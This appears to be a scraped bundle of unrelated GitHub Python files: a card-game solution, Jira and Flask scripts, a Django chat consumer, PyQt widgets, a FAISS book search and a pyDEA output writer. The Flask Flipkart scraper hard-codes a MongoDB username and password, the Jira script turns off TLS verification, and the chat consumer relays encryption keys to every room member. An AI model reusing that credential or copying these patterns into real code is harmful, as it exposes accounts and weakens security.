    "nerfies": readHyperDataInfos, # NeRFies & HyperNeRF dataset proposed by [https://github.com/google/hypernerf/releases/tag/v0.1]
    "PanopticSports" : readPanopticSportsinfos
}
| hustvl/4DGaussians | scene/dataset_readers.py | dataset_readers.py | py | 23,816 | python | en | code | 995 | github-code | 36 |
3131749916 | #https://open.kattis.com/problems/bela
def dom(x):
    """Return the Bela point value of card rank *x* in the dominant suit."""
    return {"A": 11, "K": 4, "Q": 3, "J": 20, "T": 10, "9": 14}.get(x, 0)
def rec(x):
    """Return the Bela point value of card rank *x* in a non-dominant suit."""
    return {"A": 11, "K": 4, "Q": 3, "J": 2, "T": 10}.get(x, 0)
# First line: number of hands N and the dominant suit letter.
info = input().split(" ")
cards = []
score = 0
# Each of the N hands consists of 4 cards, one per line.
for i in range(4*int(info[0])):
    cards += [input()]
for card in cards:
    if card[1] == info[1]: # card is in the dominant suit
        score += dom(card[0])
    else: # card is in a non-dominant suit
        score += rec(card[0])
print(score)
| MrLuigiBean/Some-Open-Kattis-Problems | Python3/Bela.py | Bela.py | py | 504 | python | en | code | 0 | github-code | 36 |
3540344939 | import requests
from requests.auth import HTTPBasicAuth
import json
from decouple import config
url = "https://climate.jira.com/rest/api/2/issue"
auth = HTTPBasicAuth(
"brandon.hoffman@climate.com",
f"{config('JIRA_API_KEY')}"
)
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
payload = json.dumps({
"fields": {
"project": {
"key": "HELIOS"
},
"summary": "Hackathon AI DevOps Test",
"description": "This is just a test ticket",
"issuetype": {
"name": "Bug"
}
}
})
response = requests.request(
"POST",
url,
data=payload,
headers=headers,
auth=auth,
verify=False
)
print(json.dumps(json.loads(response.text), sort_keys=True, indent=4, separators=(",", ": "))) | branhoff/jira-gpt-enhancer | backend/create_issue.py | create_issue.py | py | 811 | python | en | code | 0 | github-code | 36 |
22124651099 | import json
from channels.generic.websocket import AsyncWebsocketConsumer
from channels.db import database_sync_to_async
from .models import Message
from userauth.models import User
from .models import Conversation
class ChatConsumer(AsyncWebsocketConsumer):
    """WebSocket consumer for a chat room.

    Joins the channel group ``chat_<room_name>`` for authenticated users and
    relays three kinds of payloads to the whole group: chat messages (which
    are also persisted), shared keys and symmetric keys.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.room_name = None
        self.room_group_name = None
        self.user = None

    async def connect(self):
        """Accept the socket and join the room group; reject anonymous users."""
        self.user = self.scope['user']
        self.room_name = self.scope['url_route']['kwargs']['room_name']
        self.room_group_name = 'chat_%s' % self.room_name
        if self.user.is_authenticated:
            await self.channel_layer.group_add(
                self.room_group_name,
                self.channel_name
            )
            await self.accept()
        else:
            await self.close()

    async def disconnect(self, close_code):
        """Leave the room group when the socket closes."""
        room_name = self.scope['url_route']['kwargs']['room_name']
        print(f"WebSocket disconnected from room '{room_name}'.")
        await self.channel_layer.group_discard(
            self.room_group_name,
            self.channel_name
        )

    async def receive(self, text_data):
        """Dispatch an incoming JSON frame to the group by its payload key."""
        text_data_json = json.loads(text_data)
        if 'message' in text_data_json:
            # Message handling: persist it, then broadcast to the group.
            message = text_data_json['message']
            await self.save_message(message)
            await self.channel_layer.group_send(
                self.room_group_name,
                {
                    'type': 'chat_message',
                    'message': message
                }
            )
        elif 'shared_key' in text_data_json:
            # Shared key handling
            shared_key = text_data_json['shared_key']
            await self.channel_layer.group_send(
                self.room_group_name,
                {
                    'type': 'send_shared_key',
                    'shared_key': shared_key
                }
            )
        elif 'symmetric_key' in text_data_json:
            symmetric_key = text_data_json['symmetric_key']
            await self.channel_layer.group_send(
                self.room_group_name,
                {
                    'type': 'send_symmetric_key',
                    'symmetric_key': symmetric_key
                }
            )

    async def chat_message(self, event):
        """Forward a broadcast chat message to this socket."""
        message = event['message']
        # Bug fix: the original called Conversation.objects.get (and lazily
        # resolved the sender/receiver foreign keys) directly inside this
        # async handler, which raises SynchronousOnlyOperation under
        # Django's async safety checks. The whole lookup now runs in a
        # worker thread via database_sync_to_async.
        sender_name, receiver_name = await self.get_conversation_usernames()
        await self.send(text_data=json.dumps({
            'type': 'message',
            'sender': sender_name,
            'receiver': receiver_name,
            'message': message
        }))

    async def send_shared_key(self, event):
        """Forward a broadcast shared key to this socket."""
        shared_key = event['shared_key']
        await self.send(text_data=json.dumps({
            'type': 'shared_key',
            'shared_key': shared_key
        }))

    async def send_symmetric_key(self, event):
        """Forward a broadcast symmetric key to this socket."""
        symmetric_key = event['symmetric_key']
        await self.send(text_data=json.dumps({
            'type': 'symmetric_key',
            'symmetric_key': symmetric_key
        }))

    @database_sync_to_async
    def get_conversation_usernames(self):
        """Return (sender, receiver) usernames for this room's conversation.

        The FK accesses trigger extra queries, which is why the lookup lives
        inside database_sync_to_async rather than in the async handler.
        """
        conversation = Conversation.objects.get(room=self.room_name)
        return conversation.sender.username, conversation.receiver.username

    @database_sync_to_async
    def save_message(self, message):
        """Persist *message* in the room's conversation, marked unread."""
        room_name = self.scope['url_route']['kwargs']['room_name']
        conversation = Conversation.objects.get(room=room_name)
        # objects.create already saves; the original's extra .save() call
        # issued a redundant UPDATE and was dropped.
        Message.objects.create(
            conversation=conversation,
            message=message,
            is_read=False
        )
| codynego/ChaCha | chat/consumers.py | consumers.py | py | 3,576 | python | en | code | 1 | github-code | 36 |
74352476903 | # -*- coding: utf-8 -*-
"""
-------------------------------------------------------------------------------
GUFY - Copyright (c) 2019, Fabian Balzer
Distributed under the terms of the GNU General Public License v3.0.
The full license is in the file LICENSE.txt, distributed with this software.
-------------------------------------------------------------------------------
@author: Fabian Balzer (fabian.balzer@studium.uni-hamburg.de)
Module containing all commands used for the creation of the CheckBoxes
"""
import PyQt5.QtGui as QG
import PyQt5.QtCore as QC
import PyQt5.QtWidgets as QW
class coolCheckBox(QW.QCheckBox):
    """Modified version of QCheckBoxes.
    Creates a QCheckBox with a given text and tooltip and applies custom
    indicator icons for the unchecked/checked x base/hover/pressed/disabled
    states.
    params:
        text: Text to be shown
        tooltip: optionally create a tooltip for the edit
        checked: Bool set to false by default.
        width: fixed widget width in pixels, or None to keep it flexible.
    """
    def __init__(self, text=None, tooltip=None, checked=False, width=150):
        super().__init__()
        self.setText(text)
        self.setToolTip(tooltip)
        self.setChecked(checked)
        if width is not None:
            self.setFixedWidth(width)
        # NOTE(review): the icon URLs are relative to the process working
        # directory, so the custom indicators only load when the app is
        # started from the project root.
        self.setStyleSheet("""QCheckBox {color: rgb(0, 0, 0); height: 18 px}
                           QCheckBox::indicator:unchecked {
                           image: url(simgui_registry/Icons/CheckBoxUncheckedBase.png); height: 17 px}
                           QCheckBox::indicator:unchecked:hover {
                           image: url(simgui_registry/Icons/CheckBoxUncheckedHover.png); height: 17 px;}
                           QCheckBox::indicator:unchecked:pressed {
                           image: url(simgui_registry/Icons/CheckBoxUncheckedPressed.png); height: 17 px;}
                           QCheckBox::indicator:unchecked:disabled {
                           image: url(simgui_registry/Icons/CheckBoxUncheckedDisabled.png); height: 17 px;}
                           QCheckBox::indicator:checked {
                           image: url(simgui_registry/Icons/CheckBoxCheckedBase.png); height: 17 px;}
                           QCheckBox::indicator:checked:hover {
                           image: url(simgui_registry/Icons/CheckBoxCheckedHover.png); height: 17 px}
                           QCheckBox::indicator:checked:pressed {
                           image: url(simgui_registry/Icons/CheckBoxCheckedPressed.png); height: 17 px}
                           QCheckBox::indicator:checked:disabled {
                           image: url(simgui_registry/Icons/CheckBoxCheckedDisabled.png); height: 17 px}""")
# %% Creation
def createAllCheckBoxes(Param_Dict, CheckBox_Dict):
    """Creates all necessary CheckBoxes, stores them in CheckBox_Dict and
    wires their toggled-signals to the GUI's SignalHandler.
    params:
        Param_Dict: For storing output (provides the SignalHandler)
        CheckBox_Dict: Dict to contain all the checkBoxes
    """
    hand = Param_Dict["SignalHandler"]
    AnnotationBoxes = createAnnotationBoxes()
    LogBoxes = createLogBoxes()
    ProfileBoxes = createProfileBoxes()
    Boxes = AnnotationBoxes + LogBoxes + ProfileBoxes  # Merge the lists
    keys = ["Timestamp", "Scale", "Grid", "VelVectors", "VelStreamlines",
            "MagVectors", "MagStreamlines", "Contour", "ParticleAnno",
            "LineAnno", "XLog",
            "YLog", "ZLog", "AddProfile", "TimeSeriesProf"]
    for key, box in zip(keys, Boxes):
        CheckBox_Dict[key] = box
    CheckBox_Dict["DomainDiv"] = createDomainDivBox()
    CheckBox_Dict["SetAspect"] = coolCheckBox("Ignore aspect ratio",
                                              "If checked, the plot may not "
                                              "have the default aspect.",
                                              width=None)
    CheckBox_Dict["CommentsForPlot"] = coolCheckBox("Enable script comments",
                                                    "If checked, the output sc"
                                                    "ript will have comments "
                                                    "with suggestions in it",
                                                    True, width=200)
    CheckBox_Dict["ParticlePlot"] = createParticlePlotBox()
    # All boxes that route to the generic annotation handler are wired in a
    # single loop instead of one hand-written connect per key (removes the
    # repetition and the risk of a key/handler-argument mismatch).
    annotation_keys = ["Timestamp", "Scale", "Grid", "VelVectors",
                       "VelStreamlines", "MagVectors", "MagStreamlines",
                       "Contour", "ParticleAnno", "LineAnno", "XLog", "YLog",
                       "ZLog", "TimeSeriesProf", "SetAspect",
                       "CommentsForPlot"]
    for key in annotation_keys:
        # key=key binds the current value; a plain closure would late-bind
        # and send the final key for every box.
        CheckBox_Dict[key].toggled.connect(
            lambda *args, key=key: hand.getAnnotationInput(key))
    # The remaining boxes have dedicated handler methods:
    CheckBox_Dict["ParticlePlot"].toggled.connect(lambda *args: hand.getParticleInput())
    CheckBox_Dict["AddProfile"].toggled.connect(lambda *args: hand.getAddProfileInput())
    CheckBox_Dict["DomainDiv"].toggled.connect(lambda *args: hand.getDomainDivInput())
    return
def createAnnotationBoxes(width=200, defaultString=" "):
    """Create the checkboxes used to toggle plot annotations.
    returns:
        boxList: List containing the checkboxes
    """
    labels = ["Timestamp", "Scale", "Grid", "Velocity vectors",
              "Velocity Streamlines",
              "Magnetic field vectors", "Magnetic field Streamlines",
              "Contour lines", "Particles", "Start and end point"]
    boxList = [coolCheckBox(label,
                            f"Toggle {defaultString}{label.lower()} annotation",
                            width=width)
               for label in labels]
    boxList[-1].setFixedWidth(100)  # "Start and end point" box is narrower
    boxList[0].setChecked(True)     # timestamp annotation is on by default
    return boxList
def createLogBoxes():
    """Create checkboxes for toggling logarithmic scaling of each axis.
    returns:
        boxList: List containing the checkboxes
    """
    axis_names = ["Horizontal axis", "Vertical axis", "Color axis"]
    boxList = []
    for axis in axis_names:
        boxList.append(coolCheckBox(axis, "Set " + axis + " logarithmic"))
    # Vertical and color axes default to logarithmic scaling.
    boxList[1].setChecked(True)
    boxList[2].setChecked(True)
    return boxList
def createProfileBoxes():
    """Create the two checkboxes controlling multi-profile plotting.
    The first adds a second field to an existing profile plot; the second
    enables plotting a field for multiple times (time-series mode).
    """
    addBox = coolCheckBox("Add a second Profile",
                          "If checked, the selected field will be added to the current "
                          "plot instead of overwriting it")
    timeBox = coolCheckBox("",
                           "Plot the field for multiple"
                           " times")
    timeBox.setFixedWidth(20)
    # Only enabled once the plot window already contains a profile plot:
    addBox.setDisabled(True)
    # Only shown in time series mode:
    timeBox.setHidden(True)
    return [addBox, timeBox]
def createDomainDivBox():
    """Create the checkbox that divides projection results by domain height."""
    return coolCheckBox("Divide by height", "Divide the result of "
                        "projection by the domain height")
def createParticlePlotBox():
    """Create the checkbox switching phase/projection plots to particle fields."""
    return coolCheckBox("Particle plot", "Changes the fields to "
                        "the available particle fields of the dataset.",
                        width=None)
| Fabian-Balzer/GUFY | GUFY/simgui_modules/checkBoxes.py | checkBoxes.py | py | 8,443 | python | en | code | 0 | github-code | 36 |
73563359464 | import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '/fslhome/lc453/mlip-2/lib')))
from mpi4py import MPI
from ase.db import connect
from ase.optimize import BFGS
from ase.db import connect # api for connecting to the atoms database
import numpy as np
# Scan successive iteration directories (../it1, ../it2, ...) and record the
# running minimum convex-hull distance seen up to each iteration.
in_dir = ".."
prefix = ""
suffix = "6"
cutoff = 0.01  # NOTE(review): unused here — presumably for later filtering
min_dists = []
curr_min = 10
i = 0
while True:
    fname = os.path.join(in_dir, "it" + str(i + 1),
                         prefix + "chull_dists" + suffix + ".npy")
    if not os.path.exists(fname):
        break
    data = np.load(fname)
    # Fix: the original evaluated min(data) three times per iteration.
    smallest = min(data)
    print(smallest)
    curr_min = min(curr_min, smallest)
    min_dists.append(curr_min)
    i += 1
print(min_dists)
# (dead trailing "i=0" statement from the original removed)
13367936976 | from dotenv import load_dotenv
from os import getenv
from model import load_embeddings_model
from csv import DictReader
from ast import literal_eval
from langchain.schema.document import Document
from langchain.vectorstores import FAISS
def _load_books() -> list:
    """
    Load the books from a csv file and organize each book.
    Returns:
        list: A list of Document objects, one per book, whose page_content is
        a short textual summary (title, first author, subjects, synopsis).
    """
    # Read books from file
    books = []
    # NOTE(review): the Windows-style separator makes this path non-portable;
    # consider os.path.join('data', 'books.csv').
    with open('data\\books.csv', 'r', encoding='utf-8') as file:
        reader = DictReader(file)
        books = list(reader)
    # Convert each book into a string
    book_strings = []
    for book in books:
        author = None
        # The CSV appears to store lists as Python-literal strings (e.g.
        # "['X']"); the len(...) > 3 guard presumably skips empty-list
        # strings like "[]" before literal_eval — confirm against the data.
        if len(book['authors']) > 3 and len(literal_eval(book['authors'])) > 0:
            author = literal_eval(book['authors'])[0]
        subjects = None
        if len(book['subjects']) > 3 and len(literal_eval(book['subjects'])) > 0:
            subjects = ', '.join(literal_eval(book['subjects']))
        synopsis = book['synopsis'] if len(book['synopsis']) > 0 else None
        # Assemble "Title by Author\nSubjects: ...\nSynopsis: ...", dropping
        # any part that is missing.
        summary = book['title'] if 'title' in book else "No Title"
        summary += f" by {author}\n" if author else "\n"
        summary += f"Subjects: {subjects}\n" if subjects else ""
        summary += f"Synopsis: {synopsis}" if synopsis else ""
        book_strings.append(summary)
    return [Document(page_content=book) for book in book_strings]
def embed_books():
    """
    Embed the books into a FAISS index and save it locally ("index").
    """
    # Pull the OpenAI key from the environment.
    load_dotenv()
    openai_key = getenv('OPENAI_API_KEY')
    # Embeddings model with generous retry budget for large batches.
    embeddings = load_embeddings_model("openai", openai_key, max_retries=600)
    # Embed every book document and persist the resulting FAISS index.
    documents = _load_books()
    faiss_index = FAISS.from_documents(documents, embeddings)
    faiss_index.save_local("index")
def get_relevant_books(query: str, top_k: int) -> list:
    """
    Search the embedded books for books relevant to the provided query.
    Args:
        query (str): The search query.
        top_k (int): The number of top relevant books to retrieve.
    Returns:
        list: The page contents of the top_k most similar books.
    """
    # Pull the OpenAI key from the environment.
    load_dotenv()
    openai_key = getenv('OPENAI_API_KEY')
    embeddings = load_embeddings_model("openai", openai_key)
    # Load the locally-saved FAISS index and run a similarity search.
    faiss_index = FAISS.load_local("index", embeddings)
    matches = faiss_index.similarity_search(query, top_k)
    return [match.page_content for match in matches]
11543344946 | from flask import Flask, render_template, request,jsonify
from flask_cors import CORS,cross_origin
import requests
from bs4 import BeautifulSoup as bs
from urllib.request import urlopen
import logging
import pymongo
logging.basicConfig(filename="scrapper.log" , level=logging.INFO)
app = Flask(__name__)
@app.route("/", methods = ['GET'])
def homepage():
    """Render the search form page."""
    return render_template("index.html")
@app.route("/review" , methods = ['POST' , 'GET'])
def index():
    """Scrape Flipkart reviews for the POSTed search term and render them.

    GET renders the search form; POST scrapes product pages found for the
    term, stores the collected reviews in MongoDB and renders them.
    """
    if request.method == 'POST':
        try:
            searchString = request.form['content'].replace(" ","")
            flip_url = "https://www.flipkart.com/search?q=" + searchString
            url_opened = urlopen(flip_url).read()
            code_beautify = bs(url_opened,'html.parser')
            # CSS class names below are Flipkart-specific and brittle.
            bigbox = code_beautify.find_all("div",{"class":"_13oc-S"})
            filename = searchString + ".csv"
            # NOTE(review): fw is opened but never closed, and nothing beyond
            # the header is ever written — use a `with` block or remove it.
            fw = open(filename, "w")
            headers = "Product, Customer Name, Rating, Heading, Comment \n"
            fw.write(headers)
            allurl=[]
            for i in bigbox:
                a=("https://www.flipkart.com" + i.div.div.a["href"])
                allurl.append(a)
            rating = []
            short_com = []
            main_com = []
            name = []
            reviews=[]
            for j in allurl:
                opener = requests.get(j)
                opener.encoding='utf-8'
                product_link_code_bs = bs(opener.text,'html.parser')
                rating1 = product_link_code_bs.find_all("div",{"class":["col _2wzgFH","t-ZTKy _1QgsS5"]})
                shortlong_comm = product_link_code_bs.find_all("div",{"class":"_6K-7Co"})
                short = product_link_code_bs.find_all("p",{"class":"_2-N8zT"})
                comment = product_link_code_bs.find_all("div",{"class":"t-ZTKy"})
                name_tag = product_link_code_bs.find_all("div",{"class":"row _3n8db9"})
                try:
                    for i in rating1:
                        b = (i.div.div.text)
                        rating.append(b)
                except:
                    b = "No rating"
                    # NOTE(review): this logs the literal string "b", not the
                    # value of b — same for "u"/"c"/"d"/"e" below.
                    logging.info("b")
                try:
                    for s in name_tag:
                        u = (s.div.p.text)
                        name.append(u)
                except:
                    u = "No Name"
                    logging.info("u")
                try:
                    for y in short:
                        c = (y.text)
                        short_com.append(c)
                    # Fallback selector when counts drifted out of sync.
                    if len(short_com) != len(rating):
                        for k in shortlong_comm:
                            c = (k.text)
                            short_com.append(c)
                except:
                    c = "No Short Comment"
                    logging.info("c")
                try:
                    for l in shortlong_comm:
                        d = (l.text)
                        main_com.append(d)
                    if len(main_com) != len(rating):
                        for l in comment:
                            d =(l.div.div.text)
                            main_com.append(d)
                except:
                    d = "No Long Comment"
                    logging.info("d")
            for i in range (len(rating)):
                mydict = {"Search Term": searchString ,"Name" : name[i], "Rating": rating[i], "CommentHead": short_com[i],"Comment": main_com[i]}
                reviews.append(mydict)
            logging.info("log my final result {}".format(reviews))
            # NOTE(review): database credentials are hard-coded in source —
            # move the MongoDB URI into configuration/environment variables.
            client = pymongo.MongoClient("mongodb+srv://naman7374:naman7374@cluster0.ehmrlj9.mongodb.net/?retryWrites=true&w=majority")
            db =client['scrapper_eng_pwskills']
            coll_pw_eng = db['scraper_pwskills_eng']
            coll_pw_eng.insert_many(reviews)
            return render_template('result.html', reviews=reviews[0:(len(reviews)-1)])
        except Exception as e:
            logging.info("e")
            return 'something is wrong 6'
    else:
        return render_template('index.html')
if __name__=="__main__":
    # Bind to all interfaces on Flask's default port.
    app.run(host="0.0.0.0")
71186846185 | """
1. Go to https://developer.twitter.com/
2. Sign in with your Twitter account, or create an account
3. Look on the page for how to request a developer account
4. Fill in the information you are asked for
5. Create your project
6. Copy your project's tokens
7. Paste the credentials into this Python file
You must place your Twitter API credentials here
"""
# Twitter API credentials — fill in your own values; never commit real keys.
API_KEY = ''
API_SECRET_KEY = ''
ACCESS_TOKEN = ''
ACCESS_TOKEN_SECRET = ''
| xtecuan/CursoCienciaDeDatos | CursoCienciaDeDatos_ejemplos/sesion4/credentials.py | credentials.py | py | 498 | python | es | code | 0 | github-code | 36 |
42578020211 | ''' This module contains functions and classes responsible for
writing solutions into different outputs (files, screen, GUI, etc).
Warning:
if new methods for writing output are added, they MUST
follow the rule: data must be added
sequentially, row after row, column after column.
'''
import pulp
from itertools import chain
from collections import defaultdict
from pyDEA.core.utils.dea_utils import ZERO_TOLERANCE
from pyDEA.core.data_processing.targets_and_slacks import calculate_target
from pyDEA.core.data_processing.targets_and_slacks import calculate_radial_reduction
from pyDEA.core.data_processing.targets_and_slacks import calculate_non_radial_reduction
from pyDEA.core.utils.progress_recorders import NullProgress
class SheetWithParameters(object):
    ''' Writes parameters to a given output.

        Attributes:
            params (Parameters): parameters.
            run_date (datetime): date and time when the problem was solved.
            total_seconds (float): time (in seconds) needed to solve
                the problem.

        Args:
            params (Parameters): parameters.
            run_date (datetime): date and time when the problem was solved.
            total_seconds (float): time (in seconds) needed to solve
                the problem.
    '''
    def __init__(self, params, run_date, total_seconds):
        self.params = params
        self.run_date = run_date
        self.total_seconds = total_seconds

    def create_sheet_parameters(self, work_sheet, solution, start_row_index,
                                params_str):
        ''' Writes parameters to a given output.

            Args:
                work_sheet: object that has name attribute and implements
                    write method, it actually writes data to some output
                    (like file, screen, etc.).
                solution (Solution): solution (unused here).
                start_row_index (int): initial row index (usually used to
                    append data to existing output).
                params_str (str): string that is usually written in the first
                    row (unused here).

            Returns:
                int: index of the last row where data were written plus 1.
        '''
        work_sheet.name = 'Parameters'
        # Fixed header: run metadata followed by the table column titles.
        header_cells = (
            (0, 0, 'Run date and time:'),
            (0, 1, self.run_date.strftime('%c')),
            (1, 0, 'Calculation time:'),
            (1, 1, '{0} seconds'.format(self.total_seconds)),
            (2, 0, 'Parameter name'),
            (2, 1, 'Value'),
        )
        for row_offset, column, cell_value in header_cells:
            work_sheet.write(start_row_index + row_offset, column, cell_value)
        # One row per parameter: name in column 0, value in column 1.
        next_row = start_row_index + 3
        for name, value in self.params.params.items():
            work_sheet.write(next_row, 0, name)
            work_sheet.write(next_row, 1, value)
            next_row += 1
        return next_row
class SheetOnionRank(object):
    ''' Writes information about peel the onion solution to a given output.

        Attributes:
            ranks (list of dict of str to double):
                list that contains dictionaries that map DMU code
                to peel the onion rank.
            count (int): how many times ranks have already been written;
                guards against writing the same ranks twice.

        Args:
            ranks (list of dict of str to double):
                list that contains dictionaries that map DMU code
                to peel the onion rank.
    '''
    def __init__(self, ranks):
        self.ranks = ranks
        self.count = 0

    def create_sheet_onion_rank(self, work_sheet, solution, start_row_index,
                                params_str):
        ''' Writes information about peel the onion solution to a given output.

            Args:
                work_sheet: object that has name attribute and implements
                    write method, it actually writes data to some output
                    (like file, screen, etc.).
                solution (Solution): solution.
                start_row_index (int): initial row index (usually used to append
                    data to existing output).
                params_str (str): string that is usually written in the first
                    row.

            Returns:
                int: index of the last row where data were written plus 1,
                    or -1 if all ranks have already been written.
        '''
        work_sheet.name = 'OnionRank'
        # in case of max_slacks and peel-the-onion we should not
        # write ranks twice
        if self.count < len(self.ranks):
            work_sheet.write(start_row_index, 0, params_str)
            work_sheet.write(
                start_row_index + 1, 0,
                'Tier / Rank is the run in which DMU became efficient')
            work_sheet.write(start_row_index + 2, 0, 'DMU')
            work_sheet.write(start_row_index + 2, 1, 'Efficiency')
            work_sheet.write(start_row_index + 2, 2, 'Tier / Rank')
            ordered_dmu_codes = solution._input_data.DMU_codes_in_added_order
            row_index = start_row_index + 3
            for dmu_code in ordered_dmu_codes:
                work_sheet.write(
                    row_index, 0,
                    solution._input_data.get_dmu_user_name(dmu_code))
                if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
                    work_sheet.write(row_index, 1,
                                     solution.get_efficiency_score(dmu_code))
                    work_sheet.write(row_index, 2,
                                     self.ranks[self.count][dmu_code])
                else:
                    # LP did not solve to optimality: record the status name.
                    work_sheet.write(
                        row_index, 1,
                        pulp.LpStatus[solution.lp_status[dmu_code]])
                row_index += 1
            self.count += 1
            return row_index
        return -1
class SheetWithCategoricalVar(object):
''' Writes various solution information to a given output, and
adds categorical information if necessary.
Attributes:
categorical (str): name of categorical category.
Args:
categorical (str): name of categorical category.
'''
def __init__(self, categorical=None):
self.categorical = categorical
    def create_sheet_efficiency_scores(self, work_sheet, solution,
                                       start_row_index, params_str):
        ''' Writes efficiency scores to a given output.

            Args:
                work_sheet: object that has name attribute and implements
                    write method, it actually writes data to some output
                    (like file, screen, etc.).
                solution (Solution): solution.
                start_row_index (int): initial row index (usually used to append
                    data to existing output).
                params_str (str): string that is usually written in the first
                    row.

            Returns:
                int: index of the last row where data were written plus 1.
        '''
        work_sheet.name = 'EfficiencyScores'
        work_sheet.write(start_row_index, 0, params_str)
        work_sheet.write(start_row_index + 1, 0, 'DMU')
        work_sheet.write(start_row_index + 1, 1, 'Efficiency')
        if self.categorical is not None:
            # Extra column showing the categorical category value per DMU.
            work_sheet.write(start_row_index + 1, 2,
                             'Categorical: {0}'.format(self.categorical))
        ordered_dmu_codes = solution._input_data.DMU_codes_in_added_order
        # NOTE(review): if there are no DMUs the loop never runs and 0 is
        # returned regardless of start_row_index — confirm callers never
        # pass an empty solution.
        row_index = 0
        for count, dmu_code in enumerate(ordered_dmu_codes):
            row_index = start_row_index + count + 2
            work_sheet.write(
                row_index, 0, solution._input_data.get_dmu_user_name(dmu_code))
            if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
                work_sheet.write(
                    row_index, 1, solution.get_efficiency_score(dmu_code))
            else:
                # LP did not solve to optimality: record the status name.
                work_sheet.write(
                    row_index, 1, pulp.LpStatus[solution.lp_status[dmu_code]])
            if self.categorical is not None:
                work_sheet.write(
                    row_index, 2,
                    int(solution._input_data.coefficients[
                        dmu_code, self.categorical]))
        return row_index
def create_sheet_input_output_data_base(self, work_sheet, solution,
get_multiplier,
sheet_name, start_row_index,
params_str):
''' Writes input and output weights or weighted data to a given output
depending on input parameters.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
get_multiplier (func): function that scales weights.
sheet_name (str): name that will be written into the name
attribute of work_sheet.
start_row_index (int): initial row index (usually used to append
data to existing output).
params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
work_sheet.name = sheet_name
work_sheet.write(start_row_index, 0, params_str)
work_sheet.write(start_row_index + 1, 0, 'DMU')
work_sheet.write(start_row_index + 1, 1, 'Efficiency')
init_column_index = 2
if self.categorical is not None:
work_sheet.write(start_row_index + 1, 2,
'Categorical: {0}'.format(self.categorical))
init_column_index = 3
categories = []
categories.extend(solution._input_data.input_categories)
categories.extend(solution._input_data.output_categories)
column_index = init_column_index
for category in categories:
work_sheet.write(start_row_index + 1, column_index, category)
column_index += 1
try:
solution.vrs_duals
except AttributeError:
pass
else:
work_sheet.write(start_row_index + 1,
init_column_index + len(categories), 'VRS')
row_index = start_row_index + 2
ordered_dmu_codes = solution._input_data.DMU_codes_in_added_order
for dmu_code in ordered_dmu_codes:
dmu_name = solution._input_data.get_dmu_user_name(dmu_code)
work_sheet.write(row_index, 0, dmu_name)
if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
work_sheet.write(
row_index, 1, solution.get_efficiency_score(dmu_code))
if self.categorical is not None:
work_sheet.write(
row_index, 2,
int(solution._input_data.coefficients[
dmu_code, self.categorical]))
if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
column_index = init_column_index
for input_category in solution._input_data.input_categories:
work_sheet.write(
row_index, column_index,
get_multiplier(solution, dmu_code, input_category) *
solution.get_input_dual(dmu_code, input_category))
column_index += 1
for output_category in solution._input_data.output_categories:
work_sheet.write(
row_index, column_index,
get_multiplier(solution, dmu_code, output_category) *
solution.get_output_dual(dmu_code, output_category))
column_index += 1
try:
vrs_dual = solution.get_VRS_dual(dmu_code)
work_sheet.write(row_index, column_index, vrs_dual)
except AttributeError:
pass
else:
work_sheet.write(
row_index, 1, pulp.LpStatus[solution.lp_status[dmu_code]])
row_index += 1
return row_index
@staticmethod
def _get_const_multiplier(solution, dmu_code, category):
''' Helper method that is used for writing input and output data
to a given output.
Args:
solution (Solution): solution.
dmu_code (str): DMU code.
category (str): category name.
Returns:
int: always returns 1 since we don't need to scale weights.
'''
return 1
def create_sheet_input_output_data(self, work_sheet, solution,
start_row_index, params_str):
''' Writes input and output weights to a given output.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
start_row_index (int): initial row index (usually used to append
data to existing output).
params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
return self.create_sheet_input_output_data_base(
work_sheet, solution,
self._get_const_multiplier, 'InputOutputWeights',
start_row_index, params_str)
@staticmethod
def _get_data_multiplier(solution, dmu_code, category):
''' Helper method that is used for writing weighted data
to a given output.
Args:
solution (Solution): solution.
dmu_code (str): DMU code.
category (str): category name.
Returns:
int: a scale value to scale weights.
'''
return solution._input_data.coefficients[dmu_code, category]
def create_sheet_weighted_data(self, work_sheet, solution,
start_row_index, params_str):
''' Writes weighted data to a given output.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
start_row_index (int): initial row index (usually used to append
data to existing output).
params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
return self.create_sheet_input_output_data_base(
work_sheet, solution,
self._get_data_multiplier, 'WeightedData',
start_row_index, params_str)
def create_sheet_targets(self, work_sheet, solution, start_row_index,
params_str):
''' Writes targets to a given output.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
start_row_index (int): initial row index (usually used to append
data to existing output).
params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
work_sheet.name = 'Targets'
work_sheet.write(start_row_index, 0, params_str)
work_sheet.write(start_row_index + 1, 0, 'DMU')
work_sheet.write(start_row_index + 1, 1, 'Category')
work_sheet.write(start_row_index + 1, 2, 'Original')
work_sheet.write(start_row_index + 1, 3, 'Target')
work_sheet.write(start_row_index + 1, 4, 'Radial')
work_sheet.write(start_row_index + 1, 5, 'Non-radial')
if self.categorical is not None:
work_sheet.write(
start_row_index + 1, 6,
'Categorical: {0}'.format(self.categorical))
ordered_dmu_codes = solution._input_data.DMU_codes_in_added_order
row_index = start_row_index + 2
for dmu_code in ordered_dmu_codes:
work_sheet.write(
row_index, 0, solution._input_data.get_dmu_user_name(dmu_code))
if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
once = True
all_lambda_vars = solution.get_lambda_variables(dmu_code)
for category in chain(solution._input_data.input_categories,
solution._input_data.output_categories):
work_sheet.write(row_index, 1, category)
original = solution._input_data.coefficients[
dmu_code, category]
work_sheet.write(row_index, 2, original)
target = calculate_target(category, all_lambda_vars,
solution._input_data.coefficients)
